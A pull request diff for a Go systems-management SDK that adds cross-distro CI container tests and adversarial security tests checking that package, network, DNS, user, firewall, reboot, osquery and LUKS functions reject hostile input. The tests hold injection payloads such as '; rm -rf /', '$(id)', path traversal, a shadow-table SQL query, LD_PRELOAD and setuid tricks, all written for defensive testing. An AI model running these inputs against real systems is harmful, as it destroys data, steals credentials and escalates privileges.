### PR TITLE
Adversarial test-hardening + SDK gaps + repo security matrix

### DIFF
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -330,12 +330,14 @@ jobs:
             state: base
             path: ./sdk/sys/inventory/
             expect: lsblk ip
-          # update-ca-certificates round-trip into the real system trust bundle.
+          # update-ca-certificates round-trip into the real system trust bundle,
+          # verified with `openssl verify` (the portable, bundle-path-independent
+          # trust probe the distro-aware test uses).
           - label: sys/catrust (debian/base)
             distro: debian
             state: base
             path: ./sdk/sys/catrust/
-            expect: update-ca-certificates
+            expect: update-ca-certificates openssl
           # Real PTY + setresuid privilege drop (creates an unprivileged user).
           - label: sys/terminal (debian/base)
             distro: debian
@@ -380,7 +382,7 @@ jobs:
             distro: debian
             state: base
             path: ./sdk/sys/desktop/
-            expect: useradd runuser
+            expect: useradd runuser env
           # smartctl --scan parse + validation + fatal-exit-status-bit path
           # (real passing-SMART-health needs hardware — residual).
           - label: sys/smart (debian/base)
@@ -423,6 +425,59 @@ jobs:
         run: |
           docker run --rm --shm-size=512m --cap-add NET_ADMIN pm-sdk-container \
             go test -tags=container -count=1 -v ${{ matrix.path }} -run Container
+
+  # The non-Debian distro families. Where the per-capability Debian matrix above
+  # builds one image per cell, each distro here builds its image ONCE and runs the
+  # whole base-stage capability set in a single job (the Molecule/Kitchen "platform"
+  # model) — far fewer image rebuilds for the same coverage. The SAME container
+  # tests run, proving cross-distro portability (catrust P11Kit/SUSE backends,
+  # desktop PATH on SUSE, the os-release parse, repo/pkg native backends, …).
+  # osquery stays Debian-only (statically-built binary, identical behaviour); notify
+  # is dropped on openSUSE (no `wall` package). See test/README.md.
+  container-tests-distro:
+    name: Container Tests (${{ matrix.distro }})
+    runs-on: ubuntu-latest
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+          - { distro: fedora,    notify: ./sdk/sys/notify/, walltool: wall }
+          - { distro: almalinux, notify: ./sdk/sys/notify/, walltool: wall }
+          - { distro: arch,      notify: ./sdk/sys/notify/, walltool: wall }
+          - { distro: opensuse,  notify: '',                walltool: '' }
+    steps:
+      - uses: actions/checkout@v5
+        with:
+          path: sdk
+
+      - name: Build base image
+        run: docker build -f sdk/test/Dockerfile.${{ matrix.distro }} --target base -t pm-base .
+
+      - name: Assert base tool surface (no vacuous skip)
+        run: |
+          for tool in cryptsetup nft ip lsblk useradd runuser env smartctl gpg flatpak fuser openssl ${{ matrix.walltool }}; do
+            if ! docker run --rm pm-base sh -c "command -v $tool >/dev/null 2>&1"; then
+              echo "::error::tool '$tool' absent from the ${{ matrix.distro }} base image — its container test would skip VACUOUSLY"
+              exit 1
+            fi
+          done
+          # catrust Detect must find a refresh tool, or its test skips vacuously.
+          docker run --rm pm-base sh -c 'command -v update-ca-trust >/dev/null 2>&1 || command -v update-ca-certificates >/dev/null 2>&1' \
+            || { echo "::error::no CA-trust refresh tool on ${{ matrix.distro }}"; exit 1; }
+
+      - name: Run base-stage container tests
+        run: |
+          docker run --rm --shm-size=512m --cap-add NET_ADMIN pm-base \
+            go test -tags=container -count=1 -v -run Container \
+            ./sdk/sys/encryption/ ./sdk/sys/firewall/ ./sdk/sys/netconfig/ ./sdk/sys/inventory/ \
+            ./sdk/sys/catrust/ ./sdk/sys/terminal/ ./sdk/sys/desktop/ ./sdk/sys/smart/ \
+            ./sdk/sys/reboot/ ./sdk/sys/repo/ ./sdk/pkg/ ${{ matrix.notify }}
+
+      - name: Run antivirus (with-clamav seed DB)
+        run: |
+          docker build -f sdk/test/Dockerfile.${{ matrix.distro }} --target with-clamav -t pm-clamav .
+          docker run --rm pm-clamav \
+            go test -tags=container -count=1 -v -run Container ./sdk/sys/antivirus/
 
   test-apt:
     name: Integration Tests (apt)

--- a/adversary/dst_test.go
+++ b/adversary/dst_test.go
@@ -1,0 +1,276 @@
+package adversary
+
+// Deterministic Simulation Testing (DST), in the style of Turso/Limbo's SQLite
+// rewrite: a SEEDED, reproducible engine drives a long randomized sequence of
+// capability operations with adversarially-generated inputs, and asserts global
+// SAFETY INVARIANTS that must hold for EVERY input — not a fixed list of cases.
+// Where the per-package security machines pin specific known attacks, this
+// fuzzes the whole argv/secret boundary and catches the attack nobody enumerated.
+//
+// Reproducibility: the seed is logged and overridable (PM_DST_SEED); a failure
+// prints the seed + iteration + operation + raw input so the exact sequence
+// replays deterministically. PM_DST_ITERS scales the run.
+//
+// Invariants checked on every recorded Command:
+//   I1  no argument contains a control character — a capability must REJECT a
+//       control-bearing operand (config/log injection) before it reaches argv.
+//   I2  a flag-shaped operand ("-x") is never a bare argument — it is rejected,
+//       or it appears only after a "--" end-of-options separator.
+//   I3  an exec.Secret's plaintext never appears in any argument.
+// Plus a fault-injection pass: hostile/ malformed host OUTPUT fed to a read path
+// must never become an unsafe privileged argument on the follow-up command.
+
+import (
+	"context"
+	"math/rand"
+	"os"
+	"strconv"
+	"strings"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/pkg"
+	"github.com/manchtools/power-manage-sdk/sys/dns"
+	sdkexec "github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+	"github.com/manchtools/power-manage-sdk/sys/network"
+)
+
+const defaultDSTSeed = 0x5d_a_da_7a // a fixed default so CI is deterministic; override with PM_DST_SEED
+
+func dstSeed(t *testing.T) int64 {
+	if v := os.Getenv("PM_DST_SEED"); v != "" {
+		s, err := strconv.ParseInt(v, 10, 64)
+		if err != nil {
+			t.Fatalf("PM_DST_SEED=%q is not an int64: %v", v, err)
+		}
+		return s
+	}
+	return defaultDSTSeed
+}
+
+func dstIters() int {
+	if v := os.Getenv("PM_DST_ITERS"); v != "" {
+		if n, err := strconv.Atoi(v); err == nil && n > 0 {
+			return n
+		}
+	}
+	return 4000
+}
+
+// adversarialInput builds one operand from a palette that mixes plausibly-valid
+// values with every hostile shape the SDK must defend against.
+func adversarialInput(r *rand.Rand) string {
+	base := func() string {
+		n := r.Intn(12) + 1
+		const alpha = "abcdefghijklmnopqrstuvwxyz0123456789.-_+"
+		var b strings.Builder
+		for i := 0; i < n; i++ {
+			b.WriteByte(alpha[r.Intn(len(alpha))])
+		}
+		return b.String()
+	}
+	switch r.Intn(16) {
+	case 0:
+		return ""
+	case 1:
+		return base() // plausibly valid
+	case 2:
+		return "-pmEVIL" + base() // flag-shaped (distinctive marker so it can never
+		//                           coincide with a tool's own legitimate flag)
+	case 3:
+		return "--pmEVIL" + base() // long-flag-shaped, distinctive
+	case 4:
+		return base() + "\n" + base() // newline injection
+	case 5:
+		return base() + "\x00evil" // NUL
+	case 6:
+		return base() + "\t" + base() // tab
+	case 7:
+		return base() + "; rm -rf /" // shell metacharacters
+	case 8:
+		return base() + "$(id)" // command substitution
+	case 9:
+		return base() + "`id`" // backtick
+	case 10:
+		return base() + "=" + base() // name=version separator
+	case 11:
+		return base() + "/" + base() // path-ish
+	case 12:
+		return "../../" + base() // traversal
+	case 13:
+		return strings.Repeat("a", 200+r.Intn(400)) // overlong
+	case 14:
+		return "/abs/" + base() // absolute path
+	default:
+		return base() + string(rune(r.Intn(0x20))) // a random control byte
+	}
+}
+
+func hasControlByte(s string) bool {
+	for i := 0; i < len(s); i++ {
+		if s[i] < 0x20 || s[i] == 0x7f {
+			return true
+		}
+	}
+	return false
+}
+
+// checkArgvInvariants enforces I1 + I2 on a recorded command, given the raw
+// adversarial operand the operation was driven with.
+func checkArgvInvariants(t *testing.T, seed int64, iter int, op, input string, c sdkexec.Command) {
+	t.Helper()
+	sepAt := -1
+	for i, a := range c.Args {
+		if a == sdkexec.EndOfOptions {
+			sepAt = i
+		}
+		// I1: no control character may survive into argv.
+		if hasControlByte(a) {
+			t.Fatalf("DST seed=%d iter=%d op=%s input=%q: I1 violated — control char reached argv: %s %q",
+				seed, iter, op, input, c.Name, c.Args)
+		}
+		// I2: a flag-shaped argument that is the operand must be after "--".
+		if a == input && strings.HasPrefix(a, "-") {
+			if sepAt == -1 || sepAt >= i {
+				t.Fatalf("DST seed=%d iter=%d op=%s input=%q: I2 violated — flag-shaped operand at argv[%d] with no preceding \"--\": %s %q",
+					seed, iter, op, input, i, c.Name, c.Args)
+			}
+		}
+	}
+}
+
+// TestDST_ArgvAndSecretInvariants is the property-based core: thousands of
+// seeded random operations, each asserting I1/I2/I3.
+func TestDST_ArgvAndSecretInvariants(t *testing.T) {
+	seed := dstSeed(t)
+	iters := dstIters()
+	t.Logf("DST argv/secret: seed=%d iters=%d (replay with PM_DST_SEED=%d)", seed, iters, seed)
+	r := rand.New(rand.NewSource(seed))
+	ctx := context.Background()
+	backends := []pkg.Backend{pkg.Apt, pkg.Dnf, pkg.Pacman, pkg.Zypper, pkg.Flatpak}
+	totalCmds := 0
+
+	for i := 0; i < iters; i++ {
+		input := adversarialInput(r)
+		// operand is the raw value the op passes to the tool as a POSITIONAL
+		// operand (what I2 protects). "" means the op uses no adversarial
+		// positional operand — so a tool's own flag that coincidentally equals
+		// `input` (e.g. nmcli's `-f`) is not mistaken for an injected operand.
+		operand := input
+		fr := exectest.New(sdkexec.Direct)
+
+		switch r.Intn(6) {
+		case 0:
+			m, _ := pkg.New(backends[r.Intn(len(backends))], fr)
+			_, _ = m.Install(ctx, pkg.InstallOptions{}, input)
+		case 1:
+			m, _ := pkg.New(backends[r.Intn(len(backends))], fr)
+			_, _ = m.Remove(ctx, pkg.RemoveOptions{}, input)
+		case 2:
+			m, _ := pkg.New(backends[r.Intn(len(backends))], fr)
+			_, _ = m.InstallLocal(ctx, input, pkg.InstallLocalOptions{})
+		case 3:
+			m, _ := pkg.New(backends[r.Intn(len(backends))], fr)
+			_, _ = m.Search(ctx, input)
+		case 4:
+			m, _ := pkg.New(backends[r.Intn(len(backends))], fr)
+			_, _ = m.Pin(ctx, input)
+		case 5:
+			// The input is only used (sanitized) as the profile Name — it is not
+			// an adversarial positional operand here, so disable the I2 operand
+			// check (avoids matching nmcli's own legitimate flags like -f/-t).
+			operand = ""
+			// I3: a WPA-PSK provisioned via NetworkManager must NEVER appear in
+			// any nmcli argument (it goes only to the 0600 keyfile). Drive a
+			// random secret through a (possibly adversarial) profile.
+			secretVal := "S" + adversarialInput(r) + "Zk9" // make it >=8 so it can validate
+			sec, serr := sdkexec.NewSecret(secretVal)
+			if serr != nil {
+				break // NewSecret rejects newline-bearing secrets — that's a valid rejection
+			}
+			m, _ := network.New(network.NetworkManager, fr)
+			_, _ = m.Apply(ctx, network.Profile{Name: "pm-" + sanitize(input), SSID: "net", AuthType: network.AuthPSK, PSK: sec})
+			for _, c := range fr.Calls() {
+				for _, a := range c.Args {
+					if strings.Contains(a, secretVal) {
+						t.Fatalf("DST seed=%d iter=%d op=network.Apply: I3 violated — PSK plaintext in argv: %s %q", seed, i, c.Name, c.Args)
+					}
+				}
+			}
+		}
+
+		calls := fr.Calls()
+		totalCmds += len(calls)
+		for _, c := range calls {
+			checkArgvInvariants(t, seed, i, "op", operand, c)
+		}
+	}
+	// matches-zero guard: a driver that rejected EVERY input would pass I1/I2/I3
+	// vacuously. Valid inputs must have produced real commands for the invariants
+	// to mean anything.
+	if totalCmds == 0 {
+		t.Fatalf("DST seed=%d: zero commands recorded across %d iterations — the driver is vacuous", seed, iters)
+	}
+	t.Logf("DST argv/secret: %d commands exercised", totalCmds)
+}
+
+// TestDST_FaultInjection_HostileHostOutput is the fault-injection pass: it feeds
+// adversarial bytes as the connection name that nmcli (untrusted host output)
+// reports back to sys/dns, then asserts that hostile output never becomes a
+// privileged argument — dns either rejects it (no follow-up mutation) or proceeds
+// only with a clean, validated name. This is the class of attack where a
+// compromised host tool tries to inject through what the SDK reads, not what the
+// caller passes.
+func TestDST_FaultInjection_HostileHostOutput(t *testing.T) {
+	seed := dstSeed(t) ^ 0x1
+	iters := dstIters() / 2
+	t.Logf("DST fault-injection: seed=%d iters=%d", seed, iters)
+	r := rand.New(rand.NewSource(seed))
+	ctx := context.Background()
+	totalCmds := 0
+
+	for i := 0; i < iters; i++ {
+		hostile := adversarialInput(r) // the name nmcli reports for the device — UNTRUSTED
+		fr := exectest.New(sdkexec.Direct)
+		fr.Push(sdkexec.Result{Stdout: hostile + "\n"}, nil) // activeConnection read
+		fr.Push(sdkexec.Result{}, nil)                       // modify (only if the name validated)
+		fr.Push(sdkexec.Result{}, nil)                       // up
+		fr.Push(sdkexec.Result{}, nil)                       // rollback, if up failed
+		m, _ := dns.New(dns.NetworkManager, fr)
+		_ = m.Apply(ctx, dns.Config{Interface: "wlan0", Nameservers: []string{"10.0.0.53"}})
+
+		calls := fr.Calls()
+		totalCmds += len(calls)
+		for _, c := range calls {
+			// No hostile output may reach argv as a control char or bare flag.
+			checkArgvInvariants(t, seed, i, "dns.Apply(hostile-conn-name)", strings.TrimSpace(hostile), c)
+			// And a modify/up must never carry a hostile (control-bearing or
+			// flag-shaped) connection name — it must have been rejected upstream.
+			if c.Name == "nmcli" && len(c.Args) > 0 && (c.Args[0] == "connection") {
+				for _, a := range c.Args {
+					if a == strings.TrimSpace(hostile) && (hasControlByte(a) || strings.HasPrefix(a, "-")) {
+						t.Fatalf("DST seed=%d iter=%d: hostile nmcli output reached a privileged connection command: %q", seed, i, c.Args)
+					}
+				}
+			}
+		}
+	}
+	if totalCmds == 0 {
+		t.Fatalf("DST fault-injection seed=%d: zero commands recorded — driver is vacuous", seed)
+	}
+}
+
+// sanitize keeps the profile Name plausibly valid (Name has its own grammar);
+// the adversarial coverage of Name validation lives in the network package tests.
+func sanitize(s string) string {
+	var b strings.Builder
+	for _, c := range s {
+		if (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9') {
+			b.WriteRune(c)
+		}
+	}
+	if b.Len() == 0 {
+		return "x"
+	}
+	return b.String()
+}

--- a/adversary/security_machine_test.go
+++ b/adversary/security_machine_test.go
@@ -1,0 +1,484 @@
+package adversary
+
+import (
+	"context"
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync/atomic"
+	"testing"
+
+	pb "github.com/manchtools/power-manage-sdk/gen/go/pm/v1"
+	"github.com/manchtools/power-manage-sdk/sys/desktop"
+	"github.com/manchtools/power-manage-sdk/sys/dns"
+	"github.com/manchtools/power-manage-sdk/sys/encryption"
+	sdkexec "github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+	"github.com/manchtools/power-manage-sdk/sys/firewall"
+	"github.com/manchtools/power-manage-sdk/sys/fs"
+	"github.com/manchtools/power-manage-sdk/sys/notify"
+	"github.com/manchtools/power-manage-sdk/sys/osquery"
+	"github.com/manchtools/power-manage-sdk/sys/reboot"
+	"github.com/manchtools/power-manage-sdk/sys/remote"
+	"github.com/manchtools/power-manage-sdk/sys/user"
+)
+
+type oracle int
+
+const (
+	mustReject oracle = 1 << iota
+	noPrivilegedExec
+	noPrivilegedMutation
+	noNetwork
+	noDiskMutation
+	noSecretArgv
+)
+
+type programStep struct {
+	name   string
+	oracle oracle
+	run    func(*testing.T, *attackEnv) observation
+}
+
+type attackProgram struct {
+	name  string
+	steps []programStep
+}
+
+type observation struct {
+	err              error
+	commands         []sdkexec.Command
+	networkRequests  int
+	diskPath         string
+	secretNeedles    []string
+	additionalDetail string
+}
+
+type attackEnv struct {
+	ctx context.Context
+}
+
+// TestAdversarialAgentSecurityMachine is a cross-SDK adversarial finite suite:
+// each program is a short attacker playbook that chains remote input into local
+// privileged SDK surfaces, while a common oracle checks global safety properties
+// (reject before privileged execution/mutation, no network/disk side effects,
+// no secrets in argv). Package-local tests still pin individual bugs; this suite
+// is the higher-level attacker model that should stay red until the hardening is
+// implemented.
+func TestAdversarialAgentSecurityMachine(t *testing.T) {
+	programs := []attackProgram{
+		remoteToRootPersistenceProgram(),
+		controlPlaneLocalExfiltrationProgram(t),
+		accountAndDesktopPersistenceProgram(),
+		networkAndFirewallTakeoverProgram(),
+		rebootAndNotificationDoSProgram(),
+		encryptionSecretHygieneProgram(),
+	}
+
+	for _, program := range programs {
+		t.Run(program.name, func(t *testing.T) {
+			env := &attackEnv{ctx: context.Background()}
+			for _, step := range program.steps {
+				t.Run(step.name, func(t *testing.T) {
+					obs := step.run(t, env)
+					checkOracle(t, step, obs)
+				})
+			}
+		})
+	}
+}
+
+func checkOracle(t *testing.T, step programStep, obs observation) {
+	t.Helper()
+	if step.oracle&mustReject != 0 && obs.err == nil {
+		t.Errorf("attacker step was accepted; want rejection")
+	}
+	if step.oracle&mustReject == 0 && obs.err != nil {
+		t.Errorf("baseline step failed unexpectedly: %v", obs.err)
+	}
+	if step.oracle&noPrivilegedExec != 0 {
+		if calls := privilegedCalls(obs.commands); len(calls) != 0 {
+			t.Errorf("attacker step reached privileged execution: %+v", calls)
+		}
+	}
+	if step.oracle&noPrivilegedMutation != 0 {
+		if calls := privilegedMutations(obs.commands); len(calls) != 0 {
+			t.Errorf("attacker step reached privileged mutation: %+v", calls)
+		}
+	}
+	if step.oracle&noNetwork != 0 && obs.networkRequests != 0 {
+		t.Errorf("attacker step performed %d network request(s)", obs.networkRequests)
+	}
+	if step.oracle&noDiskMutation != 0 && obs.diskPath != "" {
+		if _, err := os.Stat(obs.diskPath); !os.IsNotExist(err) {
+			t.Errorf("attacker step mutated disk path %q (stat err=%v)", obs.diskPath, err)
+		}
+	}
+	if step.oracle&noSecretArgv != 0 {
+		if leaks := argvLeaks(obs.commands, obs.secretNeedles); len(leaks) != 0 {
+			t.Errorf("secret material leaked into argv: %v", leaks)
+		}
+	}
+	if obs.additionalDetail != "" {
+		t.Log(obs.additionalDetail)
+	}
+}
+
+func remoteToRootPersistenceProgram() attackProgram {
+	return attackProgram{
+		name: "remote payload to root persistence",
+		steps: []programStep{
+			{
+				name:   "pinned payload can be fetched to a non-system staging path",
+				oracle: noSecretArgv,
+				run: func(t *testing.T, env *attackEnv) observation {
+					payload := []byte("benign\n")
+					origin := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { _, _ = w.Write(payload) }))
+					t.Cleanup(origin.Close)
+					sum := sha256.Sum256(payload)
+					src, err := remote.NewHTTP(remote.HTTPConfig{URL: origin.URL + "/payload", ChecksumSHA256: hex.EncodeToString(sum[:])})
+					if err != nil {
+						return observation{err: err}
+					}
+					dest := filepath.Join(t.TempDir(), "payload")
+					_, err = src.Fetch(env.ctx, dest)
+					return observation{err: err, diskPath: ""}
+				},
+			},
+			{
+				name:   "cross-host redirect cannot choose the downloaded bytes",
+				oracle: mustReject | noNetwork | noDiskMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					var targetHits atomic.Int32
+					target := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+						targetHits.Add(1)
+						_, _ = w.Write([]byte("attacker payload\n"))
+					}))
+					t.Cleanup(target.Close)
+					redirector := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+						http.Redirect(w, r, target.URL+"/payload", http.StatusFound)
+					}))
+					t.Cleanup(redirector.Close)
+					dest := filepath.Join(t.TempDir(), "redirected")
+					src, err := remote.NewHTTP(remote.HTTPConfig{URL: redirector.URL + "/start"})
+					if err == nil {
+						_, err = src.Fetch(env.ctx, dest)
+					}
+					return observation{err: err, networkRequests: int(targetHits.Load()), diskPath: dest}
+				},
+			},
+			{
+				name:   "downloaded helper cannot be made setuid root",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := fs.New(r)
+					if err == nil {
+						err = m.SetMode(env.ctx, "/etc/pm-downloaded-helper", os.FileMode(0o755)|os.ModeSetuid)
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func controlPlaneLocalExfiltrationProgram(t *testing.T) attackProgram {
+	return attackProgram{
+		name: "control plane command to local exfiltration",
+		steps: []programStep{
+			{
+				name:   "ordinary inventory query can run privileged osquery",
+				oracle: noSecretArgv,
+				run: func(t *testing.T, env *attackEnv) observation {
+					installFakeTool(t, "osqueryi")
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: `[{"name":"linux"}]`}, nil)
+					q, err := osquery.New(r)
+					if err == nil {
+						res, qerr := q.Query(env.ctx, osqueryPayloadTable("os_version"))
+						if qerr != nil {
+							err = qerr
+						} else if !res.GetSuccess() {
+							err = errors.New(res.GetError())
+						}
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "raw SQL cannot read credential tables",
+				oracle: mustReject | noPrivilegedExec,
+				run: func(t *testing.T, env *attackEnv) observation {
+					installFakeTool(t, "osqueryi")
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: `[{"username":"root","hash":"$y$j9T$secret"}]`}, nil)
+					q, err := osquery.New(r)
+					if err == nil {
+						res, qerr := q.Query(env.ctx, osqueryPayloadRaw("WITH stolen AS (SELECT * FROM shadow) SELECT * FROM stolen"))
+						if qerr != nil {
+							err = qerr
+						} else if !res.GetSuccess() {
+							err = errors.New(res.GetError())
+						}
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func accountAndDesktopPersistenceProgram() attackProgram {
+	return attackProgram{
+		name: "account and desktop persistence",
+		steps: []programStep{
+			{
+				name:   "system account with nologin can be created",
+				oracle: noSecretArgv,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					m, err := user.New(user.ShadowUtils, r)
+					if err == nil {
+						err = m.Create(env.ctx, "svc", user.CreateOptions{System: true})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "new account cannot persist with tmp shell and root home",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					m, err := user.New(user.ShadowUtils, r)
+					if err == nil {
+						err = m.Create(env.ctx, "deploy", user.CreateOptions{HomeDir: "/", Shell: "/tmp/pwnsh", CreateHome: true})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "desktop run-as cannot inherit loader injection",
+				oracle: mustReject,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					m, err := desktop.New(r)
+					if err == nil {
+						_, err = m.RunAsCommand(env.ctx, desktop.Session{Username: "alice", UID: 1000, GID: 1000, Home: "/home/alice", RuntimeDir: "/run/user/1000"}, desktop.RunAsOptions{ExtraEnv: []string{"LD_PRELOAD=/tmp/evil.so"}}, "/usr/bin/true")
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func networkAndFirewallTakeoverProgram() attackProgram {
+	return attackProgram{
+		name: "network and firewall takeover",
+		steps: []programStep{
+			{
+				name:   "NetworkManager connection name from host output is revalidated",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: "-evil\n"}, nil)
+					m, err := dns.New(dns.NetworkManager, r)
+					if err == nil {
+						err = m.Apply(env.ctx, dns.Config{Interface: "eth0", Nameservers: []string{"10.0.0.53"}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "DNS cannot be poisoned with unspecified resolver",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: "Corp WiFi\n"}, nil)
+					m, err := dns.New(dns.NetworkManager, r)
+					if err == nil {
+						err = m.Apply(env.ctx, dns.Config{Interface: "wlan0", Nameservers: []string{"0.0.0.0"}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "firewall cannot install allow-all ingress rule",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					m, err := firewall.New(firewall.Nftables, "agent", r)
+					if err == nil {
+						err = m.ApplyRule(env.ctx, firewall.Rule{ID: "allow_all", Allow: true})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func rebootAndNotificationDoSProgram() attackProgram {
+	return attackProgram{
+		name: "reboot and notification denial-of-service",
+		steps: []programStep{
+			{
+				name:   "scheduled reboot must keep a grace window",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := reboot.New(r)
+					if err == nil {
+						err = m.Schedule(env.ctx, reboot.ScheduleOptions{Delay: "now", Message: "maintenance"})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "terminal-control notification cannot be broadcast",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := notify.New(r)
+					if err == nil {
+						err = m.NotifyAll(env.ctx, "Maintenance", "reboot \x1b[2Jnow")
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func encryptionSecretHygieneProgram() attackProgram {
+	return attackProgram{
+		name: "encryption secret hygiene",
+		steps: []programStep{
+			{
+				name:   "LUKS key rotation keeps passphrases out of argv",
+				oracle: noSecretArgv,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					m, err := encryption.New(encryption.LUKS, r)
+					oldKey := mustSecret(t, "correct horse battery staple")
+					newKey := mustSecret(t, "new secret passphrase")
+					if err == nil {
+						err = m.AddKey(env.ctx, "/dev/sda1", oldKey, newKey, encryption.AddKeyOptions{})
+					}
+					return observation{err: err, commands: r.Calls(), secretNeedles: []string{oldKey.Reveal(), newKey.Reveal()}}
+				},
+			},
+			{
+				name:   "LUKS mutator rejects traversal-shaped device before key handling",
+				oracle: mustReject | noPrivilegedExec,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					m, err := encryption.New(encryption.LUKS, r)
+					if err == nil {
+						err = m.RemoveKey(env.ctx, "/dev/disk/by-id/../../shadow", mustSecret(t, "current secret"))
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func osqueryPayloadTable(table string) *pb.OSQuery {
+	return &pb.OSQuery{QueryId: "adversary", Table: table}
+}
+
+func osqueryPayloadRaw(sql string) *pb.OSQuery {
+	return &pb.OSQuery{QueryId: "adversary", RawSql: sql}
+}
+
+func installFakeTool(t *testing.T, name string) {
+	t.Helper()
+	dir := t.TempDir()
+	path := filepath.Join(dir, name)
+	if err := os.WriteFile(path, []byte("#!/bin/sh\nexit 0\n"), 0o755); err != nil {
+		t.Fatalf("write fake %s: %v", name, err)
+	}
+	t.Setenv("PATH", dir+string(os.PathListSeparator)+os.Getenv("PATH"))
+}
+
+func mustSecret(t *testing.T, value string) sdkexec.Secret {
+	t.Helper()
+	secret, err := sdkexec.NewSecret(value)
+	if err != nil {
+		t.Fatalf("NewSecret: %v", err)
+	}
+	return secret
+}
+
+func privilegedCalls(commands []sdkexec.Command) []string {
+	var out []string
+	for _, c := range commands {
+		if c.Escalate {
+			out = append(out, commandString(c))
+		}
+	}
+	return out
+}
+
+func privilegedMutations(commands []sdkexec.Command) []string {
+	var out []string
+	for _, c := range commands {
+		if isPrivilegedMutation(c) {
+			out = append(out, commandString(c))
+		}
+	}
+	return out
+}
+
+func isPrivilegedMutation(c sdkexec.Command) bool {
+	if !c.Escalate {
+		return false
+	}
+	switch c.Name {
+	case "nft":
+		return containsArg(c.Args, "-f")
+	case "nmcli":
+		return len(c.Args) >= 2 && c.Args[0] == "connection" && (c.Args[1] == "modify" || c.Args[1] == "up")
+	case "resolvectl", "systemctl", "shutdown", "wall", "useradd", "usermod", "userdel", "chpasswd", "chage", "chown", "chmod", "cp", "rm", "mkdir", "sh", "ufw", "firewall-cmd", "cryptsetup":
+		return true
+	default:
+		return false
+	}
+}
+
+func containsArg(args []string, want string) bool {
+	for _, arg := range args {
+		if arg == want {
+			return true
+		}
+	}
+	return false
+}
+
+func argvLeaks(commands []sdkexec.Command, needles []string) []string {
+	if len(needles) == 0 {
+		return nil
+	}
+	var leaks []string
+	for _, c := range commands {
+		argv := commandString(c)
+		for _, needle := range needles {
+			if needle != "" && strings.Contains(argv, needle) {
+				leaks = append(leaks, fmt.Sprintf("%q in %s", needle, argv))
+			}
+		}
+	}
+	return leaks
+}
+
+func commandString(c sdkexec.Command) string {
+	return strings.TrimSpace(c.Name + " " + strings.Join(c.Args, " "))
+}

--- a/adversary/security_machine_test.go
+++ b/adversary/security_machine_test.go
@@ -447,7 +447,9 @@ func isPrivilegedMutation(c sdkexec.Command) bool {
 		return containsArg(c.Args, "-f")
 	case "nmcli":
 		return len(c.Args) >= 2 && c.Args[0] == "connection" && (c.Args[1] == "modify" || c.Args[1] == "up")
-	case "resolvectl", "systemctl", "shutdown", "wall", "useradd", "usermod", "userdel", "chpasswd", "chage", "chown", "chmod", "cp", "rm", "mkdir", "sh", "ufw", "firewall-cmd", "cryptsetup":
+	case "firewall-cmd":
+		return containsArg(c.Args, "--reload") || containsPrefixedArg(c.Args, "--add-service=") || containsPrefixedArg(c.Args, "--remove-service=")
+	case "resolvectl", "systemctl", "shutdown", "wall", "useradd", "usermod", "userdel", "chpasswd", "chage", "chown", "chmod", "cp", "rm", "mkdir", "sh", "ufw", "cryptsetup":
 		return true
 	default:
 		return false
